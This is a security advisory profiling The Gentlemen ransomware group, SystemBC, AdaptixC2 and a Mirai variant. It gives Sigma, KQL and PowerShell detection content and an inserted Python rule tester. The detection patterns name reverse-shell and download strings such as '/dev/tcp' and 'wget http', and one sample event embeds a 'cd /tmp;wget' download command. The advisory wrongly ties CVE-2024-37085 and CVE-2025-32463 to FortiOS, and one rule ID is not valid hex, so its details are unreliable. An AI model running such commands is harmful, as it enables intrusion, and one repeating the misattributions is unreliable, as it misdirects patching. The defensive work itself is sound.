Threat Summary
Recent OTX pulses indicate a significant escalation in Ransomware-as-a-Service (RaaS) operations, specifically driven by "The Gentlemen" threat actor group. This actor is aggressively exploiting vulnerabilities in FortiOS and leveraging SystemBC for covert C2 tunneling to facilitate lateral movement and ESXi encryption. Simultaneously, the AdaptixC2 post-exploitation framework is seeing increased adoption due to its cross-platform capabilities and evasion techniques. In parallel, the UNC1945 (LightBasin) group continues to target the financial sector via supply chain compromises, while the Nexcorium Mirai variant is exploiting IoT vulnerabilities (TBK DVR) to build DDoS botnets. The collective objective is data exfiltration, credential theft, and operational disruption through encryption.
Threat Actor / Malware Profile
The Gentlemen (RaaS)
- Malware Families: Babuk, Babyk, Vasa Locker, Qilin, LockBit 5.0, Medusa.
- Distribution: Exploits public-facing applications, specifically FortiOS/FortiProxy vulnerabilities (CVE-2024-37085, CVE-2025-32463).
- Behavior: Multi-platform locker (Windows, Linux, NAS, BSD, ESXi).
- C2 Communication: Uses SystemBC malware for proxying and covert tunneling; utilizes Cobalt Strike beacons.
- Persistence: Service installation, scheduled tasks.
- Techniques: Defense evasion, living-off-the-land binaries (LOLBins), credential dumping via Mimikatz.
AdaptixC2
- Type: Post-exploitation framework (Open Source).
- Language: Go and C++.
- Behavior: Modular architecture using Beacon Object Files (BOFs). Supports extensive process injection.
- C2 Communication: HTTP/S, TCP, mTLS, DNS, DoH, and SMB. Uses RC4 encryption.
- Targets: Windows, macOS, Linux.
SystemBC
- Type: Proxy Malware.
- Role: Acts as a bridge between the infected host and the actor's infrastructure, hiding malicious traffic.
- Associations: Frequently deployed by The Gentlemen and other RaaS affiliates.
Nexcorium (Mirai Variant)
- Actor: Nexus Team.
- Target: IoT Devices (TBK DVRs).
- Exploit: CVE-2024-3721 (OS command injection).
- Behavior: Brute-force credential attacks, DDoS attacks, persistence via init configuration and crontab.
IOC Analysis
The provided pulses contain a mix of high-value indicators:
- CVEs (Vulnerabilities):
  - CVE-2024-37085, CVE-2025-32463 (FortiOS): Critical for perimeter patching.
  - CVE-2024-3721 (TBK DVR): Crucial for IoT security.
  - CVE-2020-14871, CVE-2019-0708 (Oracle Solaris/RDP): Legacy system vectors.
- File Hashes (MD5/SHA1/SHA256):
- Associated with The Gentlemen payload loaders, AdaptixC2 agents, and Nexcorium binaries.
- Operationalization: Ingest into EDR solutions for immediate scanning of endpoint filesystems and memory.
- IP Addresses:
  - 176.65.148.186 (Nexcorium C2/Botnet): Block at perimeter firewalls.
SOC teams should prioritize the CVEs for vulnerability management while pushing the file hashes to EDR for detection of active compromises.
Detection Engineering
```yaml
title: Potential SystemBC Proxy Execution
id: 8c7e3b1a-9f4c-4d2a-8e5c-1a2b3c4d5e6f
description: Detects execution patterns associated with SystemBC proxy malware often used by The Gentlemen affiliates.
status: experimental
date: 2026/04/21
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\rundll32.exe'
        CommandLine|contains:
            - 'dll.dll,Run'
            - 'Proxy'
    condition: selection
falsepositives:
    - Legitimate proxy software usage
level: high
tags:
    - attack.command_and_control
    - attack.proxy
    - gentlemens
```
```yaml
title: AdaptixC2 Network Activity Indicators
id: 9d8f4c2b-0a5d-4e3f-9f6a-2b3c4d5e6f7a
description: Detects suspicious network traffic patterns characteristic of AdaptixC2 frameworks (mTLS/DoH usage).
status: experimental
date: 2026/04/21
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection_go:
        Image|contains: '.exe'
        CommandLine|contains:
            - '-nohup'
            - '/dev/tcp'
    selection_ports:
        DestinationPort:
            - 443
            - 80
            - 53
    condition: all of selection_*
falsepositives:
    - Legitimate application updates using similar ports
level: medium
tags:
    - attack.command_and_control
    - adaptixc2
```
```yaml
title: Nexcorium Mirai Variant IoT Exploit Attempt
id: 0e1g5h3c-1b6e-5f4g-0g7b-3c4d5e6f7g8h
description: Detects web requests attempting to exploit CVE-2024-3721 in TBK DVR devices.
status: experimental
date: 2026/04/21
author: Security Arsenal
logsource:
    category: webserver
detection:
    selection_uri:
        c-uri|contains:
            - '/dvrdvd/'
            - '/DVR/'
    selection_payload:
        c-uri|contains:
            - 'cd /tmp'
            - 'wget http'
            - 'busybox'
    condition: all of selection_*
falsepositives:
    - Unknown
level: critical
tags:
    - attack.initial_access
    - cve-2024-3721
    - mirai
```
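Before shipping the SystemBC and Nexcorium rules above to a SIEM, it helps to check their selections against known-good and known-bad events. The following is an added example, not part of the advisory: a minimal evaluator for those two rules (standard Sigma semantics assumed: list values OR, fields within a selection AND, every selection AND, case-insensitive matching) run over constructed sample telemetry.

```python
# Added example, not from the advisory: evaluate the SystemBC and Nexcorium
# Sigma selections above against constructed sample events.

# Sigma semantics assumed: values in a list are ORed, fields in a selection
# are ANDed, and the conditions above AND every selection (case-insensitive).
SYSTEMBC_RULE = {
    "selection": {
        ("Image", "endswith"): ["\\rundll32.exe"],
        ("CommandLine", "contains"): ["dll.dll,Run", "Proxy"],
    },
}
NEXCORIUM_RULE = {
    "selection_uri": {("c-uri", "contains"): ["/dvrdvd/", "/DVR/"]},
    "selection_payload": {("c-uri", "contains"): ["cd /tmp", "wget http", "busybox"]},
}

def field_matches(value, modifier, patterns):
    v = str(value).lower()
    if modifier == "endswith":
        return any(v.endswith(p.lower()) for p in patterns)
    if modifier == "contains":
        return any(p.lower() in v for p in patterns)
    raise ValueError(f"unsupported modifier: {modifier}")

def rule_matches(rule, event):
    # A missing field never matches, so 'all of selection_*' fails closed
    return all(
        field in event and field_matches(event[field], modifier, patterns)
        for selection in rule.values()
        for (field, modifier), patterns in selection.items()
    )

def matching_events(rule, events):
    return [e for e in events if rule_matches(rule, e)]

# Constructed sample telemetry (no real indicators)
PROCESS_EVENTS = [
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Users\\Public\\dll.dll,Run"},      # hit
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},         # miss: benign args
    {"Image": "C:\\Tools\\proxy.exe", "CommandLine": "proxy.exe --Proxy"},  # miss: Image
]
WEB_EVENTS = [
    {"c-uri": "/DVR/status?cmd=cd /tmp;wget http://203.0.113.5/x"},    # hit
    {"c-uri": "/DVR/index.html"},                                       # miss: no payload
    {"c-uri": "/api/cd /tmp"},                                          # miss: no DVR path
]
```

Each sample event carries a comment stating whether the rule should fire; extend the lists with real log lines from your own environment to measure false positives before raising the rule's level.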
```kql
// Hunt for SystemBC and AdaptixC2 file hashes on endpoints
// The last indicator is an MD5, so it is matched against the MD5 column
// rather than SHA256 (where it could never match)
DeviceFileEvents
| where Timestamp >= ago(7d)
| where SHA256 in (
    '3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235',
    '51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2',
    'cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e',
    '89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400',
    '632be2363c7a13be6d5ce0dca11e387bd0a072cc962b004f0dcf3c1f78982a5a'
) or MD5 in ('f212fd00d9ffc0f3d868845f7f4215cb')
| project Timestamp, DeviceName, FolderPath, FileName, SHA256, MD5, InitiatingProcessAccountName
```
```powershell
# IOC Hunter for The Gentlemen and AdaptixC2
# Scans C:\ for specific file hashes found in OTX pulses
# SHA256 and MD5 indicators are kept apart: the original list mixed an MD5
# into a SHA256-only comparison, so that indicator could never match.
$Sha256Hashes = @(
    '3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235',
    '51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2',
    'cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e'
)
$Md5Hashes = @(
    'f212fd00d9ffc0f3d868845f7f4215cb'
)
Write-Host "[+] Initiating IOC Scan for Gentlemen/AdaptixC2 Hashes..."
# -File skips directories, which Get-FileHash cannot hash
$Results = Get-ChildItem -Path C:\ -File -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sha = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($sha -and $Sha256Hashes -contains $sha) {
            [pscustomobject]@{ Path = $_.FullName; Algorithm = 'SHA256'; Hash = $sha }
            return
        }
        $md5 = (Get-FileHash -LiteralPath $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($md5 -and $Md5Hashes -contains $md5) {
            [pscustomobject]@{ Path = $_.FullName; Algorithm = 'MD5'; Hash = $md5 }
        }
    }
if ($Results) {
    Write-Host "[!] ALERT: Malicious files detected!" -ForegroundColor Red
    $Results | Format-Table Path, Algorithm, Hash -AutoSize
} else {
    Write-Host "[-] No matching files found on local system." -ForegroundColor Green
}
```
Response Priorities
- Immediate:
  - Block all IOCs (IPs and Domains) at perimeter firewalls and proxies.
  - Scan all endpoints for the SHA256 hashes associated with The Gentlemen, SystemBC, and AdaptixC2.
  - Isolate any systems showing signs of SystemBC or SystemBC-like proxy behavior.
- 24 Hours:
  - Initiate credential resets for accounts that may have been compromised by Mimikatz (The Gentlemen TTP) or credential brute-forcing (Nexcorium).
  - Review VPN and remote access logs for indicators of unauthorized access correlating with FortiOS exploit attempts.
  - Patch FortiOS gateways against CVE-2024-37085 and CVE-2025-32463 immediately.
- 1 Week:
  - Conduct a thorough architecture review of internet-facing assets, specifically FortiOS devices and IoT/NAS infrastructure.
  - Update EDR signatures to include detection logic for AdaptixC2's RC4 encrypted traffic patterns.
  - Audit MSP/third-party access to financial systems in response to UNC1945 activity.